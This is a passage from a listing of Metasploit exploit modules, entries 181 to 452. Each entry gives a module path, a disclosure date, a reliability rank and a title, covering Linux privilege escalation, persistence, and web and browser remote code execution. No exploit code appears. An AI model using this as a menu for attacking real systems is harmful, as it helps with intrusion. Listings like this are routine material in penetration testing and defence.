Yes WeBid converter.php Remote PHP Code Injection + 182 linux/http/wipg1000_cmd_injection 2017-04-20 excellent Yes WePresent WiPG-1000 Command Injection + 183 linux/http/xplico_exec 2017-10-29 excellent Yes Xplico Remote Code Execution + 184 linux/http/zabbix_sqli 2013-09-23 excellent Yes Zabbix 2.0.8 SQL Injection and Remote Code Execution + 185 linux/http/zen_load_balancer_exec 2012-09-14 excellent Yes ZEN Load Balancer Filelog Command Execution + 186 linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution + 187 linux/http/zimbra_xxe_rce 2019-03-13 excellent Yes Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF + 188 linux/ids/alienvault_centerd_soap_exec 2014-05-05 excellent Yes AlienVault OSSIM av-centerd Command Injection + 189 linux/ids/snortbopre 2005-10-18 good No Snort Back Orifice Pre-Preprocessor Buffer Overflow + 190 linux/imap/imap_uw_lsub 2000-04-16 good Yes UoW IMAP Server LSUB Buffer Overflow + 191 linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation + 192 linux/local/af_packet_chocobo_root_priv_esc 2016-08-12 good Yes AF_PACKET chocobo_root Privilege Escalation + 193 linux/local/af_packet_packet_set_ring_priv_esc 2017-03-29 good Yes AF_PACKET packet_set_ring Privilege Escalation + 194 linux/local/apport_abrt_chroot_priv_esc 2015-03-31 excellent Yes Apport / ABRT chroot Privilege Escalation + 195 linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence + 196 linux/local/asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation + 197 linux/local/autostart_persistence 2006-02-13 excellent No Autostart Desktop Item Persistence + 198 linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent Yes blueman set_dhcp_handler D-Bus Privilege Escalation + 199 linux/local/bpf_priv_esc 2016-05-04 good Yes Linux BPF doubleput UAF Privilege Escalation + 200 linux/local/bpf_sign_extension_priv_esc 2017-11-12 great Yes Linux BPF Sign Extension Local Privilege Escalation + 201 linux/local/cron_persistence 1979-07-01 excellent No Cron Persistence + 202 linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation + 203 linux/local/docker_daemon_privilege_escalation 2016-06-28 excellent Yes Docker Daemon Privilege Escalation + 204 linux/local/glibc_ld_audit_dso_load_priv_esc 2010-10-18 excellent Yes glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation + 205 linux/local/glibc_origin_expansion_priv_esc 2010-10-18 excellent Yes glibc '$ORIGIN' Expansion Privilege Escalation + 206 linux/local/glibc_realpath_priv_esc 2018-01-16 normal Yes glibc 'realpath()' Privilege Escalation + 207 linux/local/hp_smhstart 2013-03-30 normal No HP System Management Homepage Local Privilege Escalation + 208 linux/local/juju_run_agent_priv_esc 2017-04-13 excellent Yes Juju-run Agent Privilege Escalation + 209 linux/local/kloxo_lxsuexec 2012-09-18 excellent No Kloxo Local Privilege Escalation + 210 linux/local/lastore_daemon_dbus_priv_esc 2016-02-02 excellent Yes lastore-daemon D-Bus Privilege Escalation + 211 linux/local/libuser_roothelper_priv_esc 2015-07-24 great Yes Libuser roothelper Privilege Escalation + 212 linux/local/nested_namespace_idmap_limit_priv_esc 2018-11-15 great Yes Linux Nested User Namespace idmap Limit Local Privilege Escalation + 213 linux/local/netfilter_priv_esc_ipv4 2016-06-03 good Yes Linux Kernel 4.6.3 Netfilter Privilege Escalation + 214 linux/local/network_manager_vpnc_username_priv_esc 2018-07-26 excellent Yes Network Manager VPNC Username Privilege Escalation + 215 linux/local/ntfs3g_priv_esc 2017-01-05 good Yes Debian/Ubuntu ntfs-3g Local Privilege Escalation + 216 linux/local/overlayfs_priv_esc 2015-06-16 good Yes Overlayfs Privilege Escalation + 217 linux/local/pkexec 2011-04-01 great Yes Linux PolicyKit Race Condition Privilege Escalation + 218 linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence + 219 linux/local/rds_priv_esc 2010-10-20 great Yes Reliable Datagram Sockets (RDS) Privilege Escalation + 220 linux/local/recvmmsg_priv_esc 2014-02-02 good Yes Linux Kernel recvmmsg Privilege Escalation + 221 linux/local/service_persistence 1983-01-01 excellent No Service Persistence + 222 linux/local/sock_sendpage 2009-08-13 great Yes Linux Kernel Sendpage Local Privilege Escalation + 223 linux/local/sophos_wpa_clear_keys 2013-09-06 excellent Yes Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation + 224 linux/local/systemtap_modprobe_options_priv_esc 2010-11-17 excellent Yes SystemTap MODPROBE_OPTIONS Privilege Escalation + 225 linux/local/udev_netlink 2009-04-16 great No Linux udev Netlink Local Privilege Escalation + 226 linux/local/ueb_bpserverd_privesc 2018-03-14 excellent No Unitrends Enterprise Backup bpserverd Privilege Escalation + 227 linux/local/ufo_privilege_escalation 2017-08-10 good Yes Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation + 228 linux/local/vmware_alsa_config 2017-05-22 excellent Yes VMware Workstation ALSA Config File Local Privilege Escalation + 229 linux/local/vmware_mount 2013-08-22 excellent Yes VMWare Setuid vmware-mount Unsafe popen(3) + 230 linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence + 231 linux/local/zpanel_zsudo 2013-06-07 excellent Yes ZPanel zsudo Local Privilege Escalation Exploit + 232 linux/misc/accellion_fta_mpipe2 2011-02-07 excellent No Accellion FTA MPIPE2 Command Execution + 233 linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution + 234 linux/misc/drb_remote_codeexec 2011-03-23 excellent No Distributed Ruby Remote Code Execution + 235 linux/misc/gld_postfix 2005-04-12 good No GLD (Greylisting Daemon) Postfix Buffer Overflow + 236 linux/misc/hid_discoveryd_command_blink_on_unauth_rce 2016-03-28 excellent Yes HID discoveryd command_blink_on Unauthenticated RCE + 237 linux/misc/hikvision_rtsp_bof 2014-11-19 normal No Hikvision DVR RTSP Request Remote Code Execution + 238 linux/misc/hp_data_protector_cmd_exec 2011-02-07 excellent No HP Data Protector 6 EXEC_CMD Remote Code Execution + 239 linux/misc/hp_jetdirect_path_traversal 2017-04-05 normal No HP Jetdirect Path Traversal Arbitrary Code Execution + 240 linux/misc/hp_nnmi_pmd_bof 2014-09-09 normal Yes HP Network Node Manager I PMD Buffer Overflow + 241 linux/misc/hp_vsa_login_bof 2013-06-28 normal Yes HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow + 242 linux/misc/hplip_hpssd_exec 2007-10-04 excellent No HPLIP hpssd.py From Address Arbitrary Command Execution + 243 linux/misc/ib_inet_connect 2007-10-03 good No Borland InterBase INET_connect() Buffer Overflow + 244 linux/misc/ib_jrd8_create_database 2007-10-03 good No Borland InterBase jrd8_create_database() Buffer Overflow + 245 linux/misc/ib_open_marker_file 2007-10-03 good No Borland InterBase open_marker_file() Buffer Overflow + 246 linux/misc/ib_pwd_db_aliased 2007-10-03 good No Borland InterBase PWD_db_aliased() Buffer Overflow + 247 linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability + 248 linux/misc/jenkins_ldap_deserialize 2016-11-16 excellent Yes Jenkins CLI HTTP Java Deserialization Vulnerability + 249 linux/misc/lprng_format_string 2000-09-25 normal No LPRng use_syslog Remote Format String Vulnerability + 250 linux/misc/mongod_native_helper 2013-03-24 normal No MongoDB nativeHelper.apply Remote Code Execution + 251 linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution + 252 linux/misc/netcore_udp_53413_backdoor 2014-08-25 normal Yes Netcore Router Udp 53413 Backdoor + 253 linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow + 254 linux/misc/novell_edirectory_ncp_bof 2012-12-12 normal Yes Novell eDirectory 8 Buffer Overflow + 255 linux/misc/opennms_java_serialize 2015-11-06 normal No OpenNMS Java Object Unserialization Remote Code Execution + 256 linux/misc/qnap_transcode_server 2017-08-06 excellent Yes QNAP Transcode Server Command Execution + 257 linux/misc/quest_pmmasterd_bof 2017-04-09 normal Yes Quest Privilege Manager pmmasterd Buffer Overflow + 258 linux/misc/sercomm_exec 2013-12-31 great Yes SerComm Device Remote Code Execution + 259 linux/misc/ueb9_bpserverd 2017-08-08 excellent Yes Unitrends UEB bpserverd authentication bypass RCE + 260 linux/misc/zabbix_server_exec 2009-09-10 excellent Yes Zabbix Server Arbitrary Command Execution + 261 linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow + 262 linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow + 263 linux/pop3/cyrus_pop3d_popsubfolders 2006-05-21 normal No Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow + 264 linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution + 265 linux/pptp/poptop_negative_read 2003-04-09 great Yes Poptop Negative Read Overflow + 266 linux/proxy/squid_ntlm_authenticate 2004-06-08 great No Squid NTLM Authenticate Overflow + 267 linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) + 268 linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load + 269 linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow + 270 linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow + 271 linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) + 272 linux/smtp/exim4_dovecot_exec 2013-05-03 excellent No Exim and Dovecot Insecure Configuration Command Injection + 273 linux/smtp/exim_gethostbyname_bof 2015-01-27 great Yes Exim GHOST (glibc gethostbyname) Buffer Overflow + 274 linux/smtp/haraka 2017-01-26 excellent Yes Haraka SMTP Command Injection + 275 linux/ssh/ceragon_fibeair_known_privkey 2015-04-01 excellent No Ceragon FibeAir IP-10 SSH Private Key Exposure + 276 linux/ssh/exagrid_known_privkey 2016-04-07 excellent No ExaGrid Known SSH Key and Default Password + 277 linux/ssh/f5_bigip_known_privkey 2012-06-11 excellent No F5 BIG-IP SSH Private Key Exposure + 278 linux/ssh/loadbalancerorg_enterprise_known_privkey 2014-03-17 excellent No Loadbalancer.org Enterprise VA SSH Private Key Exposure + 279 linux/ssh/mercurial_ssh_exec 2017-04-18 excellent No Mercurial Custom hg-ssh Wrapper Remote Code Exec + 280 linux/ssh/quantum_dxi_known_privkey 2014-03-17 excellent No Quantum DXi V1000 SSH Private Key Exposure + 281 linux/ssh/quantum_vmpro_backdoor 2014-03-17 excellent No Quantum vmPRO Backdoor Command + 282 linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWind LEM Default SSH Password Remote Code Execution + 283 linux/ssh/symantec_smg_ssh 2012-08-27 excellent No Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability + 284 linux/ssh/ubiquiti_airos_file_upload 2016-02-13 excellent No Ubiquiti airOS Arbitrary File Upload + 285 linux/ssh/vmware_vdp_known_privkey 2016-12-20 excellent No VMware VDP Known SSH Key + 286 linux/telnet/netgear_telnetenable 2009-10-30 excellent Yes NETGEAR TelnetEnable + 287 linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow + 288 linux/upnp/belkin_wemo_upnp_exec 2014-04-04 excellent Yes Belkin Wemo UPnP Remote Code Execution + 289 linux/upnp/dlink_upnp_msearch_exec 2013-02-01 excellent Yes D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection + 290 linux/upnp/miniupnpd_soap_bof 2013-03-27 normal Yes MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution + 291 mainframe/ftp/ftp_jcl_creds 2013-05-12 normal Yes FTP JCL Execution + 292 multi/browser/adobe_flash_hacking_team_uaf 2015-07-06 great No Adobe Flash Player ByteArray Use After Free + 293 multi/browser/adobe_flash_nellymoser_bof 2015-06-23 great No Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow + 294 multi/browser/adobe_flash_net_connection_confusion 2015-03-12 great No Adobe Flash Player NetConnection Type Confusion + 295 multi/browser/adobe_flash_opaque_background_uaf 2015-07-06 great No Adobe Flash opaqueBackground Use After Free + 296 multi/browser/adobe_flash_pixel_bender_bof 2014-04-28 great No Adobe Flash Player Shader Buffer Overflow + 297 multi/browser/adobe_flash_shader_drawing_fill 2015-05-12 great No Adobe Flash Player Drawing Fill Shader Memory Corruption + 298 multi/browser/adobe_flash_shader_job_overflow 2015-05-12 great No Adobe Flash Player ShaderJob Buffer Overflow + 299 multi/browser/adobe_flash_uncompress_zlib_uaf 2014-04-28 great No Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free + 300 multi/browser/firefox_escape_retval 2009-07-13 normal No Firefox 3.5 escape() Return Value Memory Corruption + 301 multi/browser/firefox_pdfjs_privilege_escalation 2015-03-31 manual No Firefox PDF.js Privileged Javascript Injection + 302 multi/browser/firefox_proto_crmfrequest 2013-08-06 excellent No Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution + 303 multi/browser/firefox_proxy_prototype 2014-01-20 manual No Firefox Proxy Prototype Privileged Javascript Injection + 304 multi/browser/firefox_queryinterface 2006-02-02 normal No Firefox location.QueryInterface() Code Execution + 305 multi/browser/firefox_svg_plugin 2013-01-08 excellent No Firefox 17.0.1 Flash Privileged Code Injection + 306 multi/browser/firefox_tostring_console_injection 2013-05-14 excellent No Firefox toString console.time Privileged Javascript Injection + 307 multi/browser/firefox_webidl_injection 2014-03-17 excellent No Firefox WebIDL Privileged Javascript Injection + 308 multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution + 309 multi/browser/itms_overflow 2009-06-01 great No Apple OS X iTunes 8.1.1 ITMS Overflow + 310 multi/browser/java_atomicreferencearray 2012-02-14 excellent No Java AtomicReferenceArray Type Violation Vulnerability + 311 multi/browser/java_calendar_deserialize 2008-12-03 excellent No Sun Java Calendar Deserialization Privilege Escalation + 312 multi/browser/java_getsoundbank_bof 2009-11-04 great No Sun Java JRE getSoundbank file:// URI Buffer Overflow + 313 multi/browser/java_jre17_driver_manager 2013-01-10 excellent No Java Applet Driver Manager Privileged toString() Remote Code Execution + 314 multi/browser/java_jre17_exec 2012-08-26 excellent No Java 7 Applet Remote Code Execution + 315 multi/browser/java_jre17_glassfish_averagerangestatisticimpl 2012-10-16 excellent No Java Applet AverageRangeStatisticImpl Remote Code Execution + 316 multi/browser/java_jre17_jaxws 2012-10-16 excellent No Java Applet JAX-WS Remote Code Execution + 317 multi/browser/java_jre17_jmxbean 2013-01-10 excellent No Java Applet JMX Remote Code Execution + 318 multi/browser/java_jre17_jmxbean_2 2013-01-19 excellent No Java Applet JMX Remote Code Execution + 319 multi/browser/java_jre17_method_handle 2012-10-16 excellent No Java Applet Method Handle Remote Code Execution + 320 multi/browser/java_jre17_provider_skeleton 2013-06-18 great No Java Applet ProviderSkeleton Insecure Invoke Method + 321 multi/browser/java_jre17_reflection_types 2013-01-10 excellent No Java Applet Reflection Type Confusion Remote Code Execution + 322 multi/browser/java_rhino 2011-10-18 excellent No Java Applet Rhino Script Engine Remote Code Execution + 323 multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation + 324 multi/browser/java_setdifficm_bof 2009-11-04 great No Sun Java JRE AWT setDiffICM Buffer Overflow + 325 multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution + 326 multi/browser/java_storeimagearray 2013-08-12 great No Java storeImageArray() Invalid Array Indexing Vulnerability + 327 multi/browser/java_trusted_chain 2010-03-31 excellent No Java Statement.invoke() Trusted Method Chain Privilege Escalation + 328 multi/browser/java_verifier_field_access 2012-06-06 excellent No Java Applet Field Bytecode Verifier Cache Remote Code Execution + 329 multi/browser/mozilla_compareto 2005-07-13 normal No Mozilla Suite/Firefox compareTo() Code Execution + 330 multi/browser/mozilla_navigatorjava 2006-07-25 normal No Mozilla Suite/Firefox Navigator Object Code Execution + 331 multi/browser/msfd_rce_browser 2018-04-11 normal No Metasploit msfd Remote Code Execution via Browser + 332 multi/browser/opera_configoverwrite 2007-03-05 excellent No Opera 9 Configuration Overwrite + 333 multi/browser/opera_historysearch 2008-10-23 excellent No Opera historysearch XSS + 334 multi/browser/qtjava_pointer 2007-04-23 excellent No Apple QTJava toQTPointer() Arbitrary Memory Access + 335 multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution + 336 multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass + 337 multi/fileformat/adobe_u3d_meshcont 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun + 338 multi/fileformat/evince_cbt_cmd_injection 2017-07-13 excellent No Evince CBT File Command Injection + 339 multi/fileformat/ghostscript_failed_restore 2018-08-21 excellent No Ghostscript Failed Restore Command Execution + 340 multi/fileformat/js_unpacker_eval_injection 2015-02-18 excellent No Javascript Injection for Eval-based Unpackers + 341 multi/fileformat/libreoffice_macro_exec 2018-10-18 normal No LibreOffice Macro Code Execution + 342 multi/fileformat/maple_maplet 2010-04-26 excellent No Maple Maplet File Creation and Command Execution + 343 multi/fileformat/nodejs_js_yaml_load_code_exec 2013-06-28 excellent No Nodejs js-yaml load() Code Execution + 344 multi/fileformat/office_word_macro 2012-01-10 excellent No Microsoft Office Word Malicious Macro Execution + 345 multi/fileformat/peazip_command_injection 2009-06-05 excellent No PeaZip Zip Processing Command Injection + 346 multi/fileformat/swagger_param_inject 2016-06-23 excellent No JSON Swagger CodeGen Parameter Injector + 347 multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock) + 348 multi/ftp/wuftpd_site_exec_format 2000-06-22 great Yes WU-FTPD SITE EXEC/INDEX Format String Vulnerability + 349 multi/gdb/gdb_server_exec 2014-08-24 great No GDB Server Remote Payload Execution + 350 multi/hams/steamed 2018-04-01 manual No Steamed Hams + 351 multi/handler manual No Generic Payload Handler + 352 multi/http/activecollab_chat 2012-05-30 excellent Yes Active Collab "chat module" Remote PHP Code Injection Exploit + 353 multi/http/ajaxplorer_checkinstall_exec 2010-04-04 excellent Yes AjaXplorer checkInstall.php Remote Command Execution + 354 multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload + 355 multi/http/apache_jetspeed_file_upload 2016-03-06 manual No Apache Jetspeed Arbitrary File Upload + 356 multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) + 357 multi/http/apache_roller_ognl_injection 2013-10-31 excellent Yes Apache Roller OGNL Injection + 358 multi/http/apprain_upload_exec 2012-01-19 excellent Yes appRain CMF Arbitrary PHP File Upload Vulnerability + 359 multi/http/atutor_sqli 2016-03-01 excellent Yes ATutor 2.2.1 SQL Injection / Remote Code Execution + 360 multi/http/auxilium_upload_exec 2012-09-14 excellent Yes Auxilium RateMyPet Arbitrary File Upload Vulnerability + 361 multi/http/axis2_deployer 2010-12-30 excellent No Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) + 362 multi/http/bassmaster_js_injection 2016-11-01 excellent Yes Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution + 363 multi/http/bolt_file_upload 2015-08-17 excellent Yes CMS Bolt File Upload Vulnerability + 364 multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution + 365 multi/http/caidao_php_backdoor_exec 2015-10-27 excellent Yes China Chopper Caidao PHP Backdoor Code Execution + 366 multi/http/cisco_dcnm_upload 2013-09-18 excellent Yes Cisco Prime Data Center Network Manager Arbitrary File Upload + 367 multi/http/clipbucket_fileupload_exec 2018-03-03 excellent Yes ClipBucket beats_uploader Unauthenticated Arbitrary File Upload + 368 multi/http/cmsms_showtime2_rce 2019-03-11 normal Yes CMS Made Simple (CMSMS) Showtime2 File Upload RCE + 369 multi/http/cmsms_upload_rename_rce 2018-07-03 excellent Yes CMS Made Simple Authenticated RCE via File Upload/Copy + 370 multi/http/coldfusion_ckeditor_file_upload 2018-09-11 excellent No Adobe ColdFusion CKEditor unrestricted file upload + 371 multi/http/coldfusion_rds 2013-08-08 great Yes Adobe ColdFusion 9 Administrative Login Bypass + 372 multi/http/confluence_widget_connector 2019-03-25 excellent Yes Atlassian Confluence Widget Connector Macro Velocity Template Injection + 373 multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock) + 374 multi/http/cuteflow_upload_exec 2012-07-27 excellent Yes CuteFlow v2.11.2 Arbitrary File Upload Vulnerability + 375 multi/http/dexter_casinoloader_exec 2014-02-08 excellent Yes Dexter (CasinoLoader) SQL Injection + 376 multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection + 377 multi/http/eaton_nsm_code_exec 2012-06-26 excellent Yes Network Shutdown Module (sort_values) Remote PHP Code Injection + 378 multi/http/eventlog_file_upload 2014-08-31 excellent Yes ManageEngine Eventlog Analyzer Arbitrary File Upload + 379 multi/http/extplorer_upload_exec 2012-12-31 excellent Yes eXtplorer v2.1 Arbitrary File Upload Vulnerability + 380 multi/http/familycms_less_exec 2011-11-29 excellent Yes Family Connections less.php Remote Command Execution + 381 multi/http/freenas_exec_raw 2010-11-06 great No FreeNAS exec_raw.php Arbitrary Command Execution + 382 multi/http/gestioip_exec 2013-10-04 excellent No GestioIP Remote Command Execution + 383 multi/http/getsimplecms_unauth_code_exec 2019-04-28 excellent Yes GetSimpleCMS Unauthenticated RCE + 384 multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390 + 385 multi/http/git_submodule_command_exec 2017-08-10 excellent No Malicious Git HTTP Server For CVE-2017-1000117 + 386 multi/http/git_submodule_url_exec 2018-10-05 excellent No Malicious Git HTTP Server For CVE-2018-17456 + 387 multi/http/gitlab_shell_exec 2013-11-04 excellent Yes Gitlab-shell Code Execution + 388 multi/http/gitlist_arg_injection 2018-04-26 excellent Yes GitList v0.6.0 Argument Injection Vulnerability + 389 multi/http/gitorious_graph 2012-01-19 excellent No Gitorious Arbitrary Command Execution + 390 multi/http/glassfish_deployer 2011-08-04 excellent No Sun/Oracle GlassFish Server Authenticated Code Execution + 391 multi/http/glossword_upload_exec 2013-02-05 excellent Yes Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability + 392 multi/http/glpi_install_rce 2013-09-12 manual Yes GLPI install.php Remote Command Execution + 393 multi/http/horde_form_file_upload 2019-03-24 excellent No Horde Form File Upload Vulnerability + 394 multi/http/horde_href_backdoor 2012-02-13 excellent No Horde 3.3.12 Backdoor Arbitrary PHP Code Execution + 395 multi/http/hp_sitescope_issuesiebelcmd 2013-10-30 great Yes HP SiteScope issueSiebelCmd Remote Code Execution + 396 multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution + 397 multi/http/hp_sys_mgmt_exec 2013-06-11 excellent Yes HP System Management Homepage JustGetSNMPQueue Command Injection + 398 multi/http/hyperic_hq_script_console 2013-10-10 excellent Yes VMware Hyperic HQ Groovy Script-Console Java Execution + 399 multi/http/ibm_openadmin_tool_soap_welcomeserver_exec 2017-05-30 excellent Yes IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution + 400 multi/http/ispconfig_php_exec 2013-10-30 excellent No ISPConfig Authenticated Arbitrary PHP Code Execution + 401 multi/http/jboss_bshdeployer 2010-04-26 excellent No JBoss JMX Console Beanshell Deployer WAR Upload and Deployment + 402 multi/http/jboss_deploymentfilerepository 2010-04-26 excellent No JBoss Java Class DeploymentFileRepository WAR Deployment + 403 multi/http/jboss_invoke_deploy 2007-02-20 excellent Yes JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) + 404 multi/http/jboss_maindeployer 2007-02-20 excellent No JBoss JMX Console Deployer Upload and Execute + 405 multi/http/jboss_seam_upload_exec 2010-08-05 normal Yes JBoss Seam 2 File Upload and Execute + 406 multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE + 407 multi/http/jenkins_script_console 2013-01-18 good Yes Jenkins-CI Script-Console Java Execution + 408 multi/http/jenkins_xstream_deserialize 2016-02-24 excellent Yes Jenkins XStream Groovy classpath Deserialization Vulnerability + 409 multi/http/jira_hipchat_template 2015-10-28 excellent Yes Atlassian HipChat for Jira Plugin Velocity Template Injection + 410 multi/http/jira_plugin_upload 2018-02-22 excellent Yes Atlassian Jira Authenticated Upload Code Execution + 411 multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution + 412 multi/http/kordil_edms_upload_exec 2013-02-22 excellent Yes Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability + 413 multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution + 414 multi/http/log1cms_ajax_create_folder 2011-04-11 excellent Yes Log1 CMS writeInfo() PHP Code Injection + 415 multi/http/magento_unserialize 2016-05-17 excellent Yes Magento 2.0.6 Unserialize Remote Code Execution + 416 multi/http/makoserver_cmd_exec 2017-09-03 excellent Yes Mako Server v2.5, 2.6 OS Command Injection RCE + 417 multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection + 418 multi/http/manageengine_auth_upload 2014-12-15 excellent Yes ManageEngine Multiple Products Authenticated File Upload + 419 multi/http/manageengine_sd_uploader 2015-08-20 excellent Yes ManageEngine ServiceDesk Plus Arbitrary File Upload + 420 multi/http/manageengine_search_sqli 2012-10-18 excellent Yes ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection + 421 multi/http/mantisbt_manage_proj_page_rce 2008-10-16 excellent Yes Mantis manage_proj_page PHP Code Execution + 422 multi/http/mantisbt_php_exec 2014-11-08 great Yes MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability + 423 multi/http/mediawiki_syntaxhighlight 2017-04-06 good Yes MediaWiki SyntaxHighlight extension option injection vulnerability + 424 multi/http/mediawiki_thumb 2014-01-28 excellent Yes MediaWiki Thumb.php Remote Command Execution + 425 multi/http/metasploit_static_secret_key_base 2016-09-15 excellent Yes Metasploit Web UI Static secret_key_base Value + 426 multi/http/metasploit_webui_console_command_execution 2016-08-23 excellent No Metasploit Web UI Diagnostic Console Command Execution + 427 multi/http/mma_backdoor_upload 2012-04-02 excellent Yes Th3 MMA mma.php Backdoor Arbitrary File Upload + 428 multi/http/mobilecartly_upload_exec 2012-08-10 excellent Yes MobileCartly 1.0 Arbitrary File Creation Vulnerability + 429 multi/http/monstra_fileupload_exec 2017-12-18 excellent Yes Monstra CMS Authenticated Arbitrary File Upload + 430 multi/http/moodle_cmd_exec 2013-10-30 good No Moodle Remote Command Execution + 431 multi/http/movabletype_upgrade_exec 2013-01-07 excellent Yes Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution + 432 multi/http/mutiny_subnetmask_exec 2012-10-22 excellent Yes Mutiny Remote Command Execution + 433 multi/http/nas4free_php_exec 2013-10-30 great No NAS4Free Arbitrary Remote Code Execution + 434 multi/http/navigate_cms_rce 2018-09-26 excellent Yes Navigate CMS Unauthenticated Remote Code Execution + 435 multi/http/netwin_surgeftp_exec 2012-12-06 good Yes Netwin SurgeFTP Remote Command Execution + 436 multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability + 437 multi/http/novell_servicedesk_rce 2016-03-30 excellent Yes Novell ServiceDesk Authenticated File Upload + 438 multi/http/nuuo_nvrmini_upgrade_rce 2018-08-04 excellent Yes NUUO NVRmini upgrade_handle.php Remote Command Execution + 439 multi/http/op5_license 2012-01-05 excellent Yes OP5 license.php Remote Command Execution + 440 multi/http/op5_welcome 2012-01-05 excellent Yes OP5 welcome Remote Command Execution + 441 multi/http/openfire_auth_bypass 2008-11-10 excellent Yes Openfire Admin Console Authentication Bypass + 442 multi/http/openmediavault_cmd_exec 2013-10-30 excellent No OpenMediaVault Cron Remote Command Execution + 443 multi/http/openx_backdoor_php 2013-08-07 excellent Yes OpenX Backdoor PHP Code Execution + 444 multi/http/opmanager_socialit_file_upload 2014-09-27 excellent Yes ManageEngine OpManager and Social IT Arbitrary File Upload + 445 multi/http/oracle_ats_file_upload 2016-01-20 excellent Yes Oracle ATS Arbitrary File Upload + 446 multi/http/oracle_reports_rce 2014-01-15 great Yes Oracle Forms and Reports Remote Code Execution + 447 multi/http/oracle_weblogic_wsat_deserialization_rce 2017-10-19 excellent No Oracle WebLogic wls-wsat Component Deserialization RCE + 448 multi/http/orientdb_exec 2017-07-13 good Yes OrientDB 2.2.x Remote Code Execution + 449 multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution + 450 multi/http/pandora_upload_exec 2010-11-30 excellent Yes Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability + 451 multi/http/phoenix_exec 2016-07-01 excellent Yes Phoenix Exploit Kit Remote Code Execution + 452 multi/http/php_cgi_arg_injection 2012-05-03 excellent Yes PHP CGI Argument 